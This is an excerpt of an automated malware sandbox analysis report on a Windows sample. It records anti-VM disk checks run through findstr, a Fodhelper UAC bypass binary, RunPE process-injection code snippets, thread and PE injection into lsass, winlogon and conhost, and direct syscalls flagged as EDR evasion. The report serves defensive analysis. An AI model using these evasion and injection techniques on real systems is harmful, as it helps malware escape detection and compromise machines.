        Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
        Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8
        Source: fodhelper.exe, 00000010.00000002.1341517781.0000021682918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
        Source: cmd.exe, 0000002C.00000003.1584622401.0000015829838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" %
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdownLMEM XlH
        Source: cmd.exe, 00000008.00000003.1323937809.0000021406B8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
        Source: cmd.exe, 0000002C.00000003.1598274166.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597504148.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1607297299.0000015829834000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1606177800.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597979208.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1596938910.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597212934.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1596620569.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1607478751.0000015829834000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1597899448.0000015829838000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000002C.00000003.1598713878.0000015829838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: e7WMhx18XN.exe, 00000001.00000002.1327169256.0000000001298000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5d-
        Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
        Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_94-619
        Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_95-542
        Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_97-542
        Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeCode function: 12_2_00007FF6CF6718E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF6CF6718E8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 56_2_004019E1 StrCatW,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrCatW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,RtlFreeHeap,56_2_004019E1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeCode function: 12_2_00007FF6CF671A8C SetUnhandledExceptionFilter,12_2_00007FF6CF671A8C
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeCode function: 12_2_00007FF6CF671404 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF6CF671404
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeCode function: 12_2_00007FF6CF6718E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF6CF6718E8
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        .NET source code contains process injector
        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
        .NET source code references suspicious native API functions
        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
        Source: 56.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
        Allocates memory in foreign processes
        Source: C:\Users\user\AppData\Local\Temp\paint.exeMemory allocated: C:\Windows\System32\conhost.exe base: 113DAF00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 12BE3BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 21E7B340000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory allocated: C:\Windows\System32\conhost.exe base: 236ACAA0000 protect: page execute and read and writeJump to behavior
        Contains functionality to inject code into remote processes
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,94_2_0000000140002434
        Creates a thread in another existing process (thread injection)
        Source: C:\Users\user\AppData\Local\Temp\paint.exeThread created: C:\Windows\System32\conhost.exe EIP: DAF00000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\services64.exeThread created: C:\Windows\System32\conhost.exe EIP: E3BE0000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\services64.exeThread created: C:\Windows\System32\conhost.exe EIP: 7B340000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeThread created: C:\Windows\System32\conhost.exe EIP: ACAA0000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 780000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 800000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 400000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 3B0000
        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 60382EBC
        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C7342EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B91B2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 918F2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E962EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B8D72EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 56DC2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9CCD2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BAC02EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C9D2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1802EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B232EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27592EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9BDC2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 98F62EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CD782EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2B82EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C1332EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4092EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F61C2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 112C2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B1D2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12F62EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 115C2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B4692EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9EBD2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C6682EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B82EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 905C2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5A8E2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC5B2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA182EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 96182EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D0B72EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 55302EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 95822EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 54662EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D82EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83092EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB1C2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CACC2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6DEC2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1CA2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E2272EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1BED2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF342EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 87922EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CCCC2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 61F22EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EEB32EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 637D2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29E2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1CC82EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C6EF2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63182EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4B672EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B3B2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30FF2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5E02EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35402EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 916A2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C40A2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8FD82EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 81D2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E3AC2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A8F82EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15782EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D0E2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E3B2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 693C2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4CE2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 126F2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F17A2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11925AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11725AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6925AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F225AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F325AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10125AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13F25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6025AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E825AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5425AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D925AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C125AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14525AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D625AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C125AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C725AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11B25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7225AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7425AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D025AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13525AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8425AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11925AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9625AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9F25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5025AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CA25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14625AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7525AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A125AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11725AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C225AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5125AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6225AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C425AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5925AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5125AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1C25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F625AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13B25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13F25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E425AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11525AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DF25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10525AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14225AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E025AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5925AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10925AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CA25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10425AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7325AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12225AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9F25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA25AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13325AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7825AC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C22F2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB972EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E91B2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31C92EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD1B2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D43C2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C6DC2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CD2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29E72EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43A62EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB372EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31822EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E3642EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8EA12EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2EBE2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 96452EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A0382EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9F392EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF032EBC
        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\cmd.exe EIP: D2922EBC
        Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\conhost.exe EIP: EE52EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B8A2EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3BA02EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EDA52EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B5252EBC
        Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B5252EBC
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeNtCreateThreadEx: Direct from: 0x401A17Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeNtWriteVirtualMemory: Direct from: 0x401D57Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeNtProtectVirtualMemory: Direct from: 0x401DD7Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeNtClose: Direct from: 0x401CD7
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeNtAllocateVirtualMemory: Direct from: 0x401D97Jump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
